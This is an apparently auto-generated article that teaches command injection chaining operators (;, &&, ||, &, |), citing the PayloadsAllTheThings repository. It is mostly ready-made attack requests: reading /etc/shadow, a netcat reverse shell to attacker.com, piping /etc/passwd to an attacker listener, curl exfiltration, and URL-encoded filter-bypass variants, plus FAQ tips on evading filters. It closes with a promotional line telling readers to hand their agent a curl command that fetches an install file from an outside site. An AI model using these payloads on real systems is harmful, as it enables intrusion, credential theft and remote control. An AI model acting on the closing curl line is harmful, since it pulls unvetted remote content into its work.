Command Injection Chaining Techniques: A Complete Guide to Shell Operators
Command injection chaining techniques allow attackers to execute multiple shell commands in sequence using operators like ;, &&, ||, &, and | to bypass filters and escalate attacks.
The PayloadsAllTheThings repository by swisskyrepo serves as the definitive resource for command injection chaining techniques, documenting how Unix shell operators can concatenate payloads to achieve complex attack flows. These operators enable everything from simple command sequencing to conditional execution and background processing, making them essential tools for penetration testers and security researchers analyzing vulnerable applications.
Understanding Command Injection Chaining Operators
According to the Command Injection/README.md file in the repository, shell chaining operators function exactly as they do in standard Unix-like environments. Each operator provides distinct control flow characteristics that determine when and how subsequent commands execute.
Semicolon (;) – Unconditional Execution
The semicolon operator executes the next command unconditionally after the first command finishes, regardless of success or failure. This is the most straightforward command injection chaining technique for sequential execution.
In Command Injection/README.md, the semicolon is listed first among chaining commands as the primary method for simple concatenation when you only need the second command to run.
GET /vuln.php?cmd=whoami;id HTTP/1.1
Host: example.com
Result: The server runs whoami, completes it, then immediately runs id — both outputs appear in the HTTP response.
Logical AND (&&) – Conditional Success
The double ampersand executes the second command only if the first returns exit status 0 (success). This operator is critical for privilege escalation checks and probe-based chaining documented in the repository.
GET /vuln.php?cmd=grep -q root /etc/passwd && cat /etc/shadow HTTP/1.1
Host: example.com
Result: The sensitive cat /etc/shadow command executes only if the grep command successfully finds "root" in /etc/passwd.
Logical OR (||) – Fallback Execution
The double pipe executes the second command only if the first fails (returns non-zero exit status). This command injection chaining technique creates fallback payloads when primary commands are blocked by filters.
GET /vuln.php?cmd=cat /etc/passwd || cat /etc/shadow HTTP/1.1
Host: example.com
Result: If reading /etc/passwd is blocked or fails, the payload automatically attempts to read /etc/shadow instead.
Ampersand (&) – Background Processing
The single ampersand runs the command in the background, causing the shell to immediately return to the next command without waiting. This technique hides long-running payloads or keeps HTTP requests open while the attack continues executing.
GET /vuln.php?cmd=nc -e /bin/sh attacker.com 4444 & HTTP/1.1
Host: example.com
Result: The reverse shell spawns in the background, allowing the HTTP request to complete while maintaining the connection to the attacker's listener.
Pipe (|) – Output Redirection
The pipe operator feeds the stdout of the left command into the stdin of the right command. This enables data exfiltration by streaming command output to network tools.
GET /vuln.php?cmd=cat /etc/passwd | nc attacker.com 4444 HTTP/1.1
Host: example.com
Result: The contents of /etc/passwd are piped directly to the attacker's Netcat listener, enabling real-time data theft without writing to disk.
Practical Payload Examples from PayloadsAllTheThings
The repository's Command Injection/Intruder/command_exec.txt file contains a curated list of real-world payload variations, including URL-encoded forms that bypass naive input filters. This file demonstrates how command injection chaining techniques adapt to different defensive contexts.
URL-Encoded Newline (%0a) for Multi-Line Payloads
Newline characters serve as alternative command separators, particularly useful when space or semicolon characters are filtered. The repository documents %0a (newline) and %0d%0a (carriage return + newline) at lines 13-16 of command_exec.txt.
GET /vuln.php?cmd=id%0acurl%20http://attacker.com/%24HOST%24 HTTP/1.1
Host: example.com
Result: The server executes id on the first line, then executes curl on the subsequent line, effectively achieving the same result as semicolon chaining while bypassing character-specific filters.
Combined Chaining for Complex Attack Flows
Advanced command injection chaining techniques combine multiple operators to create robust payloads that handle various failure scenarios:
GET /vuln.php?cmd=ping -c 1 127.0.0.1 && id || whoami | nc attacker.com 4444 HTTP/1.1
Host: example.com
This pattern probes connectivity, attempts identification, falls back to basic user detection if the first command fails, and pipes all output to an external server.
Evasion and Encoding Techniques
The Command Injection/Intruder/command_exec.txt and command-execution-unix.txt files document critical encoding strategies for command injection chaining techniques:
- Semicolon encoding:
%3Bbypasses literal;filters - Logical AND encoding:
%26%26represents&&when ampersands are blocked - Pipe encoding:
%7Csubstitutes for|in strict input validation scenarios - Newline injection:
%0aand%0dachieve command separation without standard operators
These encodings enable attackers to execute chained commands even when applications implement character-based blacklists.
Summary
- Command injection chaining techniques rely on standard Unix shell operators (
;,&&,||,&,|) to execute multiple commands through a single injection point. - The
Command Injection/README.mdfile in PayloadsAllTheThings provides the canonical reference for operator behavior and selection criteria. - The
Command Injection/Intruder/command_exec.txtfile contains production-ready payload variations including URL-encoded forms (%0a,%3B,%26%26) for filter bypass. - Conditional chaining using
&&and||enables intelligent payloads that adapt to the target environment's configuration and defenses. - Background execution via
&and exfiltration piping via|support advanced post-exploitation activities without triggering timeout errors.
Frequently Asked Questions
What is the most reliable command injection chaining operator for basic testing?
The semicolon (;) is the most reliable operator for initial testing because it executes commands unconditionally regardless of exit status. According to the PayloadsAllTheThings source code, this operator works in virtually all Unix-like shell environments and requires no conditional logic to succeed.
When should I use && instead of ; in command injection payloads?
Use logical AND (&&) when you need to ensure the first command succeeds before executing the second, such as when probing for specific files or privileges before attempting escalation. The repository documents this pattern in Command Injection/README.md as essential for "privileged command after successful probe" scenarios.
How can I bypass filters that block semicolons and ampersands?
Use URL-encoded newline characters (%0a) as documented in Command Injection/Intruder/command_exec.txt lines 13-16. Newlines function as command separators in shell environments, allowing you to execute id%0awhoami equivalent to id;whoami without using blocked characters.
What is the difference between & and && in command injection contexts?
The single ampersand (&) runs the preceding command in the background and immediately proceeds to the next command, while double ampersand (&&) acts as a logical AND that only executes the next command if the previous one succeeds (returns exit code 0). Background execution via & is particularly useful for maintaining reverse shells without hanging the HTTP request.
Have a question about this repo?
These articles cover the highlights, but your codebase questions are specific. Give your agent direct access to the source. Share this with your agent to get started:
curl -s "https://instagit.com/install.md" Maintain an open-source project? Get it listed too →